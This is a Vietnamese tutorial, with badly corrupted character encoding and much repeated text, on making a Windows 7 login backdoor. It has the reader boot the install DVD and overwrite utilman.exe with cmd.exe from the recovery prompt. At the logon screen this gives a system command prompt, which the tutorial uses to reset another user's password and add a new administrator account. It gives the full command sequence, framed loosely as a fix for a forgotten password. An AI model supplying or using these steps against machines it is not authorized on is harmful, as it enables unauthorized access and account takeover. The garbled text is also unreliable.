T?o m?t Backdoor dang nh?p tr�n Windows b?ng c�ch thay th? utilman.exe
N?u b?n hay Qu�n m?t kh?u?
C?n cho m?t em backdoor don gi?n tr�n windows ?
Utilman.exe l� m?t chuong tr�nh du?c thi?t k? cho ngu?i s? d?ng v?i m?t s? h?n ch?.
Utilman cho ph�p c�c t�nh nang tr? nang nhu ph�ng d?i, tu?ng thu?t, b�n ph�m ?o, ch? d? tuong ph?n cao, vv
�i?u n�y c� th? h?u �ch cho nh?ng ngu?i c� th? l?c k�m ho?c c� v?n d? v? th�nh gi�c.
��y l� m?t l? h?ng b?o m?t v� c� th? b? khai th�c b?i m?t hacker v?i � tu?ng r� r�ng v? h? th?ng Windows.
Trong v� d? n�y,t? s? s? d?ng dia c�i d?t Windows 7.
�? b?t d?u, kh?i d?ng t? Windows 7 DVD v� khi b?n d?n m�n h�nh d?u ti�n h?i v? d?nh d?ng ng�n ng?, ti?n t? v� b�n ph�m, nh?n Next .
Tr�n trang ti?p theo, xu?ng ? ph�a tr�i b�n du?i, b?m v�o "S?a ch?a m�y t�nh c?a b?n" li�n k?t .
nh?n Next .
B�y gi? b?n s? c� m?t t�y ch?n d? "Ch?n m?t c�ng c? ph?c h?i". Ch?n Command Prompt .
B�y gi? b?n s? c� m?t c?a s? Command Prompt m?. G� c�c l?nh sau:
C:\
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe�i?u n�y s? di?u hu?ng d?n thu m?c system32, d?i t�n utilman.exe d? utilman.exe.bak, t?o m?t b?n sao c?a cmd.exe v� d?t t�n cho n� utilman.exe.
H?y b? c�c dia DVD v� kh?i d?ng l?i h? th?ng.
M?t khi m�y t�nh kh?i d?ng b�nh thu?ng, nh?n t? h?p ph�m Windows Key + U v� b?n s? nh?n du?c m?t Command Prompt. N?u Command Prompt m�o xu?t hi?n, nh?n Alt + Tab nhu Command Prompt c� th? xu?t hi?n ph�a sau m�n h�nh Logon. T? d�y, b?n c� th? ch?y c�c l?nh b?n thu?ng c� th? s? d?ng trong Command Prompt.
Trong v� d? n�y, ch�ng ta s? s? d?ng dia c�i d?t Windows 7. �? b?t d?u, kh?i d?ng t? Windows 7 DVD v� khi b?n d?n m�n h�nh d?u ti�n h?i v? d?nh d?ng ng�n ng?, ti?n t? v� b�n ph�m, nh?n Next .Tr�n trang ti?p theo, xu?ng ? ph�a tr�i b�n du?i, b?m v�o "S?a ch?a m�y t�nh c?a b?n" li�n k?t .
Ti?p theo, ch?n "S? d?ng c�ng c? ph?c h?i c� th? gi�p kh?c ph?c v?n d? kh?i d?ng Windows. Ch?n m?t h? di?u h�nh d? s?a ch?a "t�y ch?n, ch?n h? di?u h�nh t? danh s�ch v� nh?n Next .
B�y gi? b?n s? c� m?t t�y ch?n d? "Ch?n m?t c�ng c? ph?c h?i". Ch?n Command Prompt .B�y gi? b?n s? c� m?t c?a s? Command Prompt m?. G� c�c l?nh sau:C:\
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe�i?u n�y s? di?u hu?ng d?n thu m?c system32, d?i t�n utilman.exe d? utilman.exe.bak, t?o m?t b?n sao c?a cmd.exe v� d?t t�n cho n� utilman.exe.H?y b? c�c dia DVD v� kh?i d?ng l?i h? th?ng.M?t khi m�y t�nh kh?i d?ng b�nh thu?ng, nh?n t? h?p ph�m Windows Key + U v� b?n s? nh?n du?c m?t Command Prompt. N?u Command Prompt doesnt xu?t hi?n, nh?n Alt + Tab nhu Command Prompt c� th? xu?t hi?n ph�a sau m�n h�nh Logon. T? d�y, b?n c� th? ch?y nhi?u (n?u kh�ng ph?i t?t c?) c�c l?nh b?n thu?ng c� th? s? d?ng trong Command Prompt.
C:\
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe�?t l?i M?t kh?u ngu?i d�ng
�? thi?t l?p l?i m?t kh?u ngu?i d�ng hi?n t?i, ch�ng ta c?n g� van b?n du?i d�y. Trong v� d? n�y, ch�ng t�i s? thay d?i m?t kh?u JohnDoe "hunter2".
net user JohnDoe hunter2B?n s? c� th? dang nh?p v?i m?t kh?u m?i n�y ngay l?p t?c.N?u b?n kh�ng bi?t nh?ng g� t�n ngu?i d�ng tr�n h? th?ng th?c s? l�, b?n c� th? th?y m?t danh s�ch c?a ngu?i s? d?ng b?ng c�ch g�:
net user
net user JohnDoe hunter2net userT?o m?t t�i kho?n ngu?i d�ng m?i
�? t?o m?t t�i kho?n ngu?i d�ng m?i trong Command Prompt (T�n dang nh?p: M?t kh?u NewGuy:. Abc123), v� th�m ch�ng v�o Administrators lo?i thu?c nh�m: M?t l?n n?a, b?n s? c� th? dang nh?p ngay v?i t�i kho?n m?i n�y.
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /add
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /addho�n nguy�n thay d?i
�? kh�i ph?c utilman.exe, trong c�c lo?i Command Prompt trong: Sau d� kh?i d?ng l?i h? th?ng.
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe
�? lo?i b? c�c t�i kho?n ngu?i d�ng m?i m� b?n v?a t?o ra tru?c d�, g� v�o:
net user NewGuy /delete
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exenet user NewGuy /delete�? thi?t l?p l?i m?t kh?u ngu?i d�ng hi?n t?i, ch�ng ta c?n g� van b?n du?i d�y. Trong v� d? n�y, ch�ng t�i s? thay d?i m?t kh?u JohnDoe d? "hunter2".
net user JohnDoe hunter2B?n s? c� th? dang nh?p v?i m?t kh?u m?i n�y ngay l?p t?c.
N?u b?n kh�ng bi?t nh?ng g� t�n ngu?i d�ng tr�n h? th?ng th?c s? l�, b?n c� th? th?y m?t danh s�ch c?a ngu?i s? d?ng b?ng c�ch g�:
net userT?o m?t t�i kho?n ngu?i d�ng m?i
�? t?o m?t t�i kho?n ngu?i d�ng m?i trong Command Prompt (T�n dang nh?p: M?t kh?u NewGuy:. Abc123), v� th�m ch�ng v�o Administrators lo?i thu?c nh�m: M?t l?n n?a, b?n s? c� th? dang nh?p ngay v?i t�i kho?n m?i n�y.
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /addho�n nguy�n thay d?i
�? kh�i ph?c utilman.exe, trong c�c lo?i Command Prompt trong: Sau d� kh?i d?ng l?i h? th?ng.
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe�? lo?i b? c�c t�i kho?n ngu?i d�ng m?i m� b?n v?a t?o ra tru?c d�, g� v�o:
net user NewGuy /delete
No comments: